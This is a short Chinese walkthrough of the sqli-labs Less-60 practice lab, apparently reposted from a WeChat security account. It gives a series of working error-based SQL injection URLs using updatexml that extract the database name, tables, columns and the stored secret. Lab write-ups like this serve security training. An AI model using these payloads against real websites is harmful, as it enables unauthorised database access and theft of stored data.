Sqli-labs-Less-60
本关对输入次数的限制为5次,不做过多解释,直接使用报错注入
判断注入点
http://www.web.com/sql/Less-60/?id=1"
报错,并显示我们少了一个),存在注入
查看数据库
http://www.web.com/sql/Less-60/?id=1") and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
查看表
http://www.web.com/sql/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+
查看字段
http://www.web.com/sql/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='5uur039ahk'),0x7e),1)--+
查看密码
http://www.web.com/sql/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_GRR2) from challenges.5uur039ahk),0x7e),1)--+
将得到的密码输入到下面的方框中进行验证
成功
原文始发于微信公众号(龙蜀安全):SQL-Labs Less-60
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论